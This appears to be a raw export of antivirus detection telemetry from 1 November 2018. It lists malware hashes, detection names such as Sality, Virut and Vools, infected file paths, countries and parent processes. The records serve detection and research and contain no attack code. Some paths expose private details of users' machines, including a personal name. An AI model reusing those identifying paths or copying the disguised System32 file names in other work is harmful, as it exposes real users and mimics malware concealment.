  Row(detection=Row(filename='1103f6fbcf2aa324d840f010a8ef613aaf4c613b39bc2a800e85366f38d2e91f', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_30.10.2018-20.categorizing\\1103F6FBCF2AA324D840F010A8EF613AAF4C613B39BC2A800E85366F38D2E91F', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='1103f6fbcf2aa324d840f010a8ef613aaf4c613b39bc2a800e85366f38d2e91f', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-01T07:47:19Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-084729-fa7c0fc5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_1735652b\\AVSCAN-20181101-084513-DF755581\\AVSCAN-20181101-084729-FA7C0FC5', filesize=592000, name='PUA/DownloadGuide.Gen.#M1.#R1'), hash='11333b43e18e6e5657fd43852fac142f194637af5854020ee1e4338ab47054e5', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:47:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='st6unst.exe', filepath='D:\\MAIN CROFIL DOCS SERVER 2010\\BACK UP\\NENITA GARCIA FILES\\SSS-DIFF. COMPANY\\LAILA\\R5-SSS of Diff. com\\SSS-DIFF. COMPANY\\NELTEX\\ST6UNST.EXE', filesize=2240000, name='W32/Sality.AT.#M1.#R1'), hash='11a2d2f42bbe475c20bf767b3939527ec32f51983a05765931eaf39f74b41b10', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T22:42:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='servertool.exe', filepath='C:\\Program Files\\Java\\jre6\\bin\\servertool.exe', filesize=116000, name='W32/Sality.AW.#M1.#R1'), hash='11ccb466a25dc3bc38249c2810824d9df9a341fdb4c090435dd0306786c891fa', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-01T02:56:48Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mshta.exe', filepath='\\\\?\\C:\\Windows\\System32\\mshta.exe', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='1206eeadf6297fcfc9ed4ace9f1bc0bd3b8c7322e17f5fe5325a0b20da5eeca5', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:19:40Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='beetle.bug.3 .exe', filepath='\\?\\J:\\العاب\\Beetle.Bug.3\\Beetle.Bug.3 .exe', filesize=832000, name='W32/Virut.Gen.#M1.#R1'), hash='12334133514062566687058c3a16fab30e461332f81887d55bf4d876f07458e3', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:45:32Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='imglng.dll', filepath='C:\\Program Files\\Canon\\My Image Garden\\zh-Hans\\imglng.dll', filesize=156000, name='W32/Ramnit.C.#M1.#R1'), hash='12e1d1acbeb36d045a28570234cead541040c489dae30c63284cb00af28e8ed1', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:59:46Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='12edca008452e0cd91d29ad5ebe55c0c1613c64086103399acd8d0e5666c1e17', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries29.10.2018-25.categorizing\\12EDCA008452E0CD91D29AD5EBE55C0C1613C64086103399ACD8D0E5666C1E17', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='12edca008452e0cd91d29ad5ebe55c0c1613c64086103399acd8d0e5666c1e17', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-01T07:44:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msinfo32.exe', filepath='\\\\?\\C:\\Windows\\system32\\msinfo32.exe', filesize=320000, name='W32/Virut.Gen.#M1.#R1'), hash='137e9f3a29c0dbea1e928b20a4ef1e562c63ff12ab657865479d9bc28171fdd1', metadata=Row(cmdline=None, country='SG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T05:54:14Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msinfo32.exe', filepath='C:\\Windows\\System32\\msinfo32.exe', filesize=320000, name='W32/Virut.Gen.#M1.#R1'), hash='137e9f3a29c0dbea1e928b20a4ef1e562c63ff12ab657865479d9bc28171fdd1', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='US', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T12:21:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msinfo32.exe', filepath='C:\\Windows\\System32\\msinfo32.exe', filesize=320000, name='W32/Virut.Gen.#M1.#R1'), hash='137e9f3a29c0dbea1e928b20a4ef1e562c63ff12ab657865479d9bc28171fdd1', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='SG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T06:01:58Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msinfo32.exe', filepath='C:\\Windows\\System32\\msinfo32.exe', filesize=320000, name='W32/Virut.Gen.#M1.#R1'), hash='137e9f3a29c0dbea1e928b20a4ef1e562c63ff12ab657865479d9bc28171fdd1', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='SG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T05:48:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msinfo32.exe', filepath='C:\\Windows\\System32\\msinfo32.exe', filesize=320000, name='W32/Virut.Gen.#M1.#R1'), hash='137e9f3a29c0dbea1e928b20a4ef1e562c63ff12ab657865479d9bc28171fdd1', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T10:24:36Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msinfo32.exe', filepath='C:\\Windows\\System32\\msinfo32.exe', filesize=320000, name='W32/Virut.Gen.#M1.#R1'), hash='137e9f3a29c0dbea1e928b20a4ef1e562c63ff12ab657865479d9bc28171fdd1', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T09:34:14Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='new folder .exe', filepath='\\?\\J:\\العاب\\Beetle.Bug.3\\New folder\\New folder .exe', filesize=832000, name='W32/Virut.Gen.#M1.#R1'), hash='139c0548d7d0472df6622ff2c7e02107e9d84e892c0e031392c4e48b23d6319b', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:45:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='don gia 2006 tinh dong nai.exe', filepath='D:\\Du Lieu Cu Truoc day\\luu tru o D\\d\\USB 11-7-2011\\hitosoft\\HitoSoft\\Don gia 2006 Tinh Dong Nai.exe', filesize=1280000, name='HEUR/AGEN.1027222.#M1.#R1'), hash='13aa34f67d38cf9710af046bef57183eb168c839efa0655ce2348ff43eb737bb', metadata=Row(cmdline='-r', country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Kaspersky Lab\\Kaspersky Anti-Virus 17.0.0\\avp.exe', parentsize=241544, timestamp='2018-11-01T08:09:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-200103-bea2e667', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c5ba033c\\AVSCAN-20181101-200044-BADB5AAE\\AVSCAN-20181101-200103-BEA2E667', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T13:01:05Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T22:51:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='srv64', filepath='C:\\Windows\\System32\\srv64', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Microsoft Security Client\\MsMpEng.exe', parentsize=119864, timestamp='2018-11-01T19:09:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:16:36Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:19:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:20:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='\\\\?\\c:\\windows\\system32\\maintenancesservices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T13:00:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T03:43:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-091835-ee8d8f2c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-091810-EA1CF699\\AVSCAN-20181101-091835-EE8D8F2C', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:19:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:43:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:08:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-01T02:26:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-01T01:27:12Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T10:35:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T04:03:12Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-01T02:45:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T05:46:25Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:08:59Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:03:55Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:32:44Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T01:56:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='\\?\\C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T01:56:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='srv64', filepath='C:\\Windows\\System32\\srv64', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-01T05:52:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-125942-afc07066', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a6a30824\\AVSCAN-20181101-125933-AE28F57B\\AVSCAN-20181101-125942-AFC07066', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T05:59:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-01T04:58:48Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='srv64', filepath='C:\\Windows\\System32\\srv64', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='BD', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-01T04:19:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T20:51:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:57:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T01:58:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='BD', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-01T03:26:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='\\\\?\\c:\\windows\\system32\\maintenancesservices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T00:26:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-070845-7d52d3a3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9d1bc712\\AVSCAN-20181101-070830-7AB635C1\\AVSCAN-20181101-070845-7D52D3A3', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T03:39:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='\\\\?\\c:\\windows\\system32\\maintenancesservices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T00:26:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-01T07:14:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T04:16:38Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-085846-83cf02c7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_63a94eb3\\AVSCAN-20181101-085812-7E2BFCF0\\AVSCAN-20181101-085846-83CF02C7', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T01:58:49Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T13:43:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-01T12:42:57Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-094502-9de32913', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_46754ccb\\AVSCAN-20181101-094440-9A1552E8\\AVSCAN-20181101-094502-9DE32913', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:45:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:13:16Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='srv64', filepath='C:\\Windows\\System32\\srv64', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-01T00:59:38Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:31:11Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T06:47:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T00:59:23Z'), dt=datetime.date(2018, 11, 1)),
